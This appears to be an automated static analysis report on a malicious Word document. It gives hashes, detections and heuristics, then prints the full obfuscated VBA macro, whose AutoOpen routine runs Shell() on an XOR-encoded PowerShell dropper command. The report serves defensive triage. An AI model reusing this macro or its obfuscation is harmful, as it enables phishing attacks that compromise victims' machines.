Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1bc5e4eb8d292920…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 90.8 KB
Created: 2018-06-20 07:57:00
Authoring application: Microsoft Office Word
First seen: 2018-07-04
MD5: d1d77c8b2f9da6c0cebc0fd42da2146d
SHA-1: 07ead73c9a56493b4e63e0d1f35c3fb2b23cd400
SHA-256: 1bc5e4eb8d292920d8360049ef65c84ee906d896ceac14119fd4047c7f3e6868
Risk Score: 212

Malware Insights

MITRE ATT&CK
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro. The macro uses string concatenation to obfuscate a call to PowerShell, likely to download and execute a second-stage payload. The presence of the Shell() call and the ClamAV detection strongly indicate malicious intent.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-7148147-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-7148147-0
  • VBA macros detected [medium] (OLE_VBA_MACROS), 3 related findings
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
    Matched line in script:
      lEOfk = CDate(NijFtE + Sin(92989 + 14658) * 55519 * CInt(93711))
      RmlwUGm = iAUArwUoM + Shell(AipJqinfzr + TNhkXARAPw + SLtFzQwmCwt, 12073 - 12073)
      lWfTs = CDate(17733)
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
      End Function
      Sub AutoOpen()
      On Error Resume Next
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11710 bytes
SHA-256: 963f9f140957cae1602828551827c42577008db34f4bfb64d24da45c5fe08d51
Detection: ClamAV: No threats found
Obfuscation or payload: likely
178 of 352 identifiers look randomly generated (e.g. 'r91G91d95L21r0K'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "rijHcrGiz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ziLtmSwPswqr"
Function BoCFr()
On Error Resume Next
cQnzVI = CByte(wjcRFY)
raFUz = 24061
wjhVO = CDate(39275)
dEGMS = CDate(sWGhw + Sin(6690 + 10844) * 18613 * CInt(8890))
VNOkNp = 49756
tbYAhQ = KrFDQh
sWPKUEaQElX = "OwerSHell" + "  & ((vARiAb" + "lE '*mDR*')" + ".NAM" + "E[3,11,2]-jOI" + "n'') ( " + Chr(34) + "$( " + "SeT-VaR" + "iAble  'Of" + "S'  '')" + Chr(34) + "+[St"
BSIrC = CByte(tpTfNF)
mZGuD = 64734
VNBbpD = CDate(79124)
wlKsz = CDate(YUNFn + Sin(5992 + 84986) * 79140 * CInt(74451))
lDEnbd = 91099
ZfOzkl = mGkQqC
PVUviik = "RiNG]('11E7" + "6>77G121~" + "66>90>" + "76E" + "15N18r15K65N" + "74d88>2r64d77" + "~69~74d76K91~" + "15r93L78L65!" + "75!64" + "N6"
CDfaGC = CByte(prnMv)
mCEHMF = 11008
lMsiR = CDate(4259)
NwwlF = CDate(ZZjcPf + Sin(29461 + 24104) * 8468 * CInt(63497))
zFfVUG = 50017
PwIcjO = rlaOs
SorcI = "6K20N11>" + "64N107E99~109E6" + "7L15~18~1" + "5!65d74N88r2!"
jKjfIS = CByte(tqihr)
YLGYK = 65434
TVLhwp = CDate(24561)
HAwbpu = CDate(fsdAiK + Sin(10770 + 30758) * 64633 * CInt(25423))
VKdkGO = 45882
UhKRhX = ACoSD
HiQKGctJU = "64>77>69r74>" + "76~9" + "1G15d124E86d92" + "d91>74!66E1r97" + "~74L91r1!12" + "0K74E77d108d6"
BoCFr = sWPKUEaQElX + PVUviik + SorcI + HiQKGctJU
End Function
Function WRwBMT()
On Error Resume Next
IjNFdT = CByte(VfQqS)
JhGlj = 62209
NoszMo = CDate(38155)
XDhFzJ = CDate(wwvTj + Sin(81038 + 10103) * 32866 * CInt(78315))
SYjOw = 1713
ojrDfq = rGrdfl
MzJmXK = "7!70!" + "74G65" + "!9" + "1~2" + "0>11d96K123E9" + "8~93" + "G117r1" + "5K18K15d"
kHXDNX = CByte(cXrNz)
IUaNl = 2024
sRiQM = CDate(88421)
zjTkI = CDate(LYkiwV + Sin(20079 + 12098) * 42356 * CInt(67634))
dKGZjU = 44967
cYdDE = tThmls
zImjnr = "8K71N9" + "1d" + "91E95L2" + "1d0L0E31G24r" + "26r26>75N65~7" + "8N69!75K1K76K64" + "L66G0!2" + "5L" + "87d88>78N93L1"
roHWic = CByte(oQGvBa)
fWOvr = 74391
bzZfM = CDate(42696)
vzUUvT = CDate(uQWMpA + Sin(54209 + 84903) * 59920 * CInt(28093))
nvdMhr = 86686
wTjKG = zNVTjn
OrCUK = "25>74r77!92L0" + ">111d71" + "r91G91d95L21r0K" + "0!64K88L65L2L91" + "L93~"
LZpjSL = CByte(PCzkq)
jVQCtn = 16828
VhzMNd = CDate(39203)
SmjAsM = CDate(nLmLW + Sin(14124 + 76839) * 77112 * CInt(62544))
nJHtz = 70136
ObjQUQ = BIjGL
IRcYpYvuX = "78E65r92L" + "95N64>" + "93N91L1" + "d76G64~66E0r95d" + "90!77L0N119d72N" + "98N121d74L28!0" + "r111G71>91L91K"
WhtQc = CByte(BnQwVV)
ZFjOR = 73998
jjQbQG = CDate(80935)
FuAXB = CDate(dhndFl + Sin(62409 + 72361) * 98339 * CInt(24521))
ZwwcqL = 49357
SjTclu = njpRi
nvkNwXDkk = "95d21>0L0L88r88" + "L88L1r66L92G68>" + "95d93E64L74d" + "68K91N1r93!9" + "0>0>77N72E107"
kTwhD = CByte(wZWdTz)
PQiBiU = 68685
kSwMzn = CDate(8376)
BRTMTB = CDate(UuVIaC + Sin(5138 + 31266) * 83616 * CInt(69682))
taLYGc = 38919
TbfMkw = KIHNMH
NiUfH = "~73!123L1" + "26G104G" + "117E127K0" + "r111r" + "71r91G"
CGbUUc = CByte(ohVZJ)
srOuOn = 88399
lHiOTK = CDate(72454)
PMPvo = CDate(akcnN + Sin(58595 + 50835) * 9511 * CInt(11736))
FEbHKZ = 61824
mVnwuU = ualUz
DoCaDpHjq = "91r95E21L" + "0L0N88G8" + "8N88r1L" + "66G78K68" + "r22G" + "30>26K23~3" + "1>31N1N93!9" + "0L0>" + "106!106N12"
MiTjBw = CByte(wXpZvE)
MUlMu = 13044
UCCdr = CDate(69084)
zjMRMY = CDate(pjCqP + Sin(51508 + 66186) * 91629 * CInt(35911))
ZfGtD = 8088
vvQtqF = sprEdE
pbRTGpYnV = "4!127L12" + "6~30d25E22K8" + "7>105K0" + "G11" + "1G71K91~9" + "1E95~21!0K0" + "N88~88>88~1N6" + "8~" + "90d91K74~92~"
fdmZjO = CByte(wSDJiX)
wPAFj = 77626
WjJMb = CDate(73582)
voVALY = CDate(VCkzS + Sin(9718 + 24806) * 24115 * CInt(10347))
pZOIr = 74874
tqiPBi = PjpTt
HZKGE = "71L64d95K1d" + "68N70G74K65E" + "77N70d74!65~91" + "!74~" + "76d71G1K" + "76r64E66N" + "0L22K1" + "05r" + "30r23G110~" + "22"
WRwBMT = MzJmXK + zImjnr + OrCUK + IRcYpYvuX + nvkNwXDkk + NiUfH + DoCaDpHjq + pbRTGpYnV + HZKGE
End Function
Function mjTkawt()
On Error Resume Next
KMSMJ = CByte(iTlDOu)
zSiavT = 68050
Rlcjm = CDate(53763)
ojRzdY = CDate(GUAGol + Sin(30544 + 88231) * 5561 * CInt(31708))
YYpcb = 31226
JSacdw = piznvF
TtzsZNl = "E0E8>1d124L95r6" + "7K70!91d" + "7r8d111r8G6d20>" + "11>110G10" + "9N94d88N12"
XiMGcJ = CByte(LFUHn)
hkqEEa = 28928
pTZuQp = CDate(36076)
THztYf = CDate(iswSj + Sin(83794 + 52997) * 9755 * CInt(67321))
mXwlzZ = 17517
MpvSUa = vvzDY
STBPDqCS = "2E15E18!1" + "5d11~76!77>12" + "1E66N90~7" + "6L1G65~74L" + "87K91L7K30~3" + "~15N25"
HwNOqv = CByte(zXSwj)
cLEHQ = 22972
zciAFC = CDate(33498)
qmXiTl = CDate(KblHE + Sin(41875 + 78606) * 93934 * CInt(68224))
EiThN = 42045
iudkSm = udPcw
fbAjQ = "r31N29!25~2" + "6>27>6E20N11" + ">70d91L109>9" + "5G125~1" + "5G18>15d" + "11K7" + "4>65E89N2" + "1>91~74G66d95"
bQIfwL = CByte(HnzXA)
nQapYv = 52035
kqWfO = CDate(14231)
wANYk = CDate(ELkivW + Sin(8241 + 27238) * 35899 * CInt(25376))
kWJvow = 64977
wzIED = KtLYA
ZwjQYCG = "K15d4" + "N1" + "5r" + "8L115>8!"
BBwDR = CByte(PjRwEs)
VlDjZ = 76168
DiZUDf = CDate(95201)
VhfSr = CDate(WBrBs + Sin(63596 + 21542) * 17055 * CInt(84681))
kuFHL = 43398
ViCXj = qUCrw
MYoCqTMRU = "15r4E15>11G" + "110!109E94~88" + "G122N15d" + "4L15E8d"
mjTkawt = TtzsZNl + STBPDqCS + fbAjQ + ZwjQYCG + MYoCqTMRU
End Function
Function IrrfdNnR()
On Error Resume Next
zLLYu = CByte(KwUcZl)
ZGdBT = 98677
qKQAM = CDate(30891)
GwMIXc = CDate(wkJji + Sin(98599 + 68580) * 85869 * CInt(18278))
UQkZSt = 64585
SETKmi = zCTdG
kzbcmC = "1~74!87" + "G7" + "4d8!20N73~64G" + "93~" + "74!"
ulcwBZ = CByte(IwVTPI)
zbPtn = 23928
VJusQ = CDate(68688)
BzQtKn = CDate(mEwYW + Sin(20242 + 9132) * 31933 * CInt(81749))
DAROMO = 22442
Evszjf = jpvfIU
pukRFMdkjWz = "78" + "!76>71~7G1" + "1d12" + "4>95" + "E71K85>89" + "L15K" + "70d65!15G11N9"
twDESP = CByte(VrfURQ)
rHrTwC = 85195
Usmik = CDate(59265)
uvLcia = CDate(JccoJ + Sin(10529 + 81062) * 83908 * CInt(83282))
qlPVr = 43354
pFjckj = VvuVs
hFBnKO = "6>123G98~9" + "3~117G6K84N" + "91G" + "93E8" + "6~84E1" + "1K64r107" + "L99K109~67G1G10" + "7G"
LTdBK = CByte(fwwKMm)
QTzqYc = 77717
ifsRz = CDate(70154)
Rmrozz = CDate(QHRVf + Sin(85360 + 25791) * 70501 * CInt(52329))
opYLPD = 61778
rSDctU = qFVGJj
ZEnoaOhJoHa = "64N" + "88E65!67L64!" + "78N75r105>70G67" + "~74>7d1" + "1d124~95N71r" + "85G89" + "r1>123K" + "64r124K91r93r70" + "L65d72!7G6K3r15"
utzEzZ = CByte(hEYRDz)
KkUBW = 72715
iuGbWE = CDate(23501)
WLzEoH = CDate(NDmwK + Sin(20941 + 53335) * 17124 * CInt(11320))
LnPqh = 79430
UjmuSH = qIjtI
NXAKj = "L11r70>91K109d9" + "5!125d" + "6K20G124~91" + ">78" + "K93" + ">91~2!12"
EniClA = CByte(CVawDE)
vmjDqw = 48303
NjaWEo = CDate(53455)
pJEXA = CDate(jKUEzb + Sin(38918 + 5470) * 50107 * CInt(58321))
vkZRq = 40201
IUIPu = ShihE
XGqtWl = "7G93L64d" + "76>74>92L92!" + "15>11G70~9" + "1N10" + "9~95L125>20" + "N77"
cFKGw = CByte(vTTzv)
dFowj = 54341
mqWDi = CDate(23465)
SRYiE = CDate(jtJLp + Sin(9739 + 78201) * 16557 * CInt(24536))
OzJSKF = 89012
YWwCj = NkqCSL
HlwLMSXCWwN = "!93E74L78L" + "68E20" + ">82N76d78~91L76" + "G71L84E88L93L70" + "d91G74L2L71E" + "64!92"
duGwZ = CByte(zjjJsb)
uzGCc = 75202
onCiV = CDate(40735)
FBHIjX = CDate(wQtnLD + Sin(9145 + 12226) * 93735 * CInt(92113))
EbGFPV = 74362
mmfYH = nAlQoD
qlwnQ = "!91N15r11K" + "112L1G106N87r76" + ">74G95r91G70~" + "64!" + "65L1"
YzhqGO = CByte(iAjtSV)
QdWbz = 7289
mjIMWt = CDate(21927)
BiJzCk = CDate(fIUSFb + Sin(73354 + 65812) * 96073 * CInt(95501))
RBmAQm = 42965
LRGVi = dlPDs
mLPhjw = "E98~74E92L92>7" + "8E72G74N" + "20K82" + "r82'-SpliT" + " '"
PEABK = CByte(Ohuqj)
mhUTLf = 7882
pUQVwn = CDate(8420)
ojAoi = CDate(pwMhl + Sin(94590 + 18463) * 38597 * CInt(26127))
ILwjUY = 47671
OChoBv = lRHrou
uWJShzvBFcI = "g'-SPlIT" + " '~' -s" + "PLIt'k'-sPlIT" + "'r'-SPlIt " + "'>'-SpLIT " + "'E'-s" + "pLIt" + "'D'-"
IrrfdNnR = kzbcmC + pukRFMdkjWz + hFBnKO + ZEnoaOhJoHa + NXAKj + XGqtWl + HlwLMSXCWwN + qlwnQ + mLPhjw + uWJShzvBFcI
End Function
Function SZzuCz()
On Error Resume Next
hLXsb = QSYpn
UZPlQ = 1541
WtZRU = 23843
OXWZA = CDate(3666)
imVGj = CByte(uFPDt)
vEcpIh = CDate(DfoOka + Sin(29691 + 61926) * 66098 * CInt(41834))
ItwwlwilZVf = "SPlIt 'n'" + "-sPLiT'L'-sp" + "lIT'!' |" + "FORE" + "aCh-object{" + "[cHar] " + "( $_-BxoR 0x"
GwzRFZ = NYhXW
RmjzK = 97830
wMZFC = 28734
XZpJoQ = CDate(60238)
ATSsi = CByte(ACTqMD)
pUpwf = CDate(ZKHFUd + Sin(18641 + 8301) * 94945 * CInt(99914))
TlIlDlLhww = "2F  )" + " })+" + Chr(34) + "$(SEt-ITeM  'V" + "ARiABLE:o"
jUDvZD = JwSZE
zJjHZ = 56348
tDNbsM = 70925
HuBnrn = CDate(65472)
aSTbpd = CByte(RfCkvP)
LtwWmC = CDate(YZtohn + Sin(9850 + 27559) * 91339 * CInt(63178))
mizYTwu = "Fs' ' ') " + Chr(34) + " " + ")"
SZzuCz = ItwwlwilZVf + TlIlDlLhww + mizYTwu
End Function

Function rXUMoaz()
On Error Resume Next
iRMffW = CDate(19087)
KOYOJI = 35345
mIQkZz = 18580
LqEro = CByte(JzZtwl)
FFtWwu = lfwLi
bQGijD = CDate(jZmKQi + Sin(37506 + 41931) * 80108 * CInt(90027))
MwXkV = CDate(82893)
pcSAH = 73077
SrwJw = 25539
PKvXl = CByte(QEEET)
BnzcV = MfGlw
YHRjv = CDate(lZPdbW + Sin(80333 + 15915) * 344 * CInt(41898))
DDFEpH = CDate(77759)
wbzfA = 52117
KYLHE = 79442
bdidE = CByte(cCjit)
djjdQI = PRKJt
wliMr = CDate(mXtCIz + Sin(2815 + 39704) * 55665 * CInt(67064))
Qzakdi = CDate(43039)
VlJZEI = 63483
amppLl = 34299
wfiaW = CByte(MaEpj)
WPzzHR = MiYLY
kltQnk = CDate(rXKYHb + Sin(78394 + 35605) * 73643 * CInt(53347))
bCCfzN = CDate(96581)
ljVCuQ = 47460
pDjSCP = 54199
bioJu = CByte(Gumib)
PBTfv = jJYLj
mzHBJ = CDate(ljcvMB + Sin(97720 + 19751) * 12455 * CInt(87180))
End Function
Function PTiOwW()
On Error Resume Next
arlkBF = CDate(76188)
nzzWX = 33212
Rdwls = 97094
RauRvJ = CByte(jMfqr)
UjTUnM = fzvNO
jivuiV = CDate(QCwIdL + Sin(29039 + 65897) * 58470 * CInt(88863))
DmiQGKb = iwjsH + Chr(zLCYaDRZ + 80 + EPrdJTEj)
WwYpCn = CDate(54894)
RnYTJ = 65469
RVFqNX = 64870
NkLJGp = CByte(kGYLu)
HZGjWZ = zPzSP
ANdpfX = CDate(jIzKF + Sin(60315 + 19861) * 90580 * CInt(72806))
ErQYDR = CDate(49206)
aSsDw = 49112
mYrLpP = 30451
pDMDm = CByte(vOWJd)
PcfWHj = kkdcKt
pAowXE = CDate(jGOdY + Sin(642 + 47654) * 16728 * CInt(23326))
PTiOwW = LMHAw + DmiQGKb + BoCFr + WRwBMT + mjTkawt + IrrfdNnR + SZzuCz
pVNZqz = CDate(16445)
ilOHIj = 9480
ipFiSP = 13593
fjElno = CByte(LhQHMn)
zijiY = DsIws
TzXju = CDate(HzbAfz + Sin(97131 + 86598) * 12369 * CInt(16217))
End Function
Function GnSTEPSiMd(TNhkXARAPw)
On Error Resume Next
pTrmzO = CDate(10421)
EuADh = 79907
czwHXv = 36725
hqbwP = CByte(YtUbi)
dpKwkC = URuNIC
KaSjdz = CDate(zCidwi + Sin(1262 + 42310) * 4353 * CInt(61761))
hzkuc = CDate(79429)
Kaqqw = 74843
wOJTak = 67373
ozoGw = CByte(PhNpQz)
BDCMP = RGwJiL
lEOfk = CDate(NijFtE + Sin(92989 + 14658) * 55519 * CInt(93711))
RmlwUGm = iAUArwUoM + Shell(AipJqinfzr + TNhkXARAPw + SLtFzQwmCwt, 12073 - 12073)
lWfTs = CDate(17733)
VSXkw = 16186
QFzQRX = 40319
MABECL = CByte(YmGWVz)
iDqWM = Plljv
vcjsNO = CDate(lfbRaV + Sin(89567 + 96079) * 15372 * CInt(56426))
End Function
Sub AutoOpen()
On Error Resume Next
ccbcw = CDate(81059)
pzMmG = 59228
PwTTt = 38775
vbdnO = CByte(LNFoY)
vhpFr = bsHsjN
KLbEda = CDate(QThrDP + Sin(65258 + 97756) * 38763 * CInt(18814))
Application.Run LTwTfiTG + "GnSTEPSiMd" + ibwiaIvGKp, vmMobv + PTiOwW + iWCKtGFiquL
hckSu = CDate(62849)
ANbls = 63005
PvjEmU = 72771
kIidI = CByte(UAJwF)
kZObuA = nVOYm
MbHwO = CDate(zmHiF + Sin(7592 + 24063) * 20044 * CInt(61842))
End Sub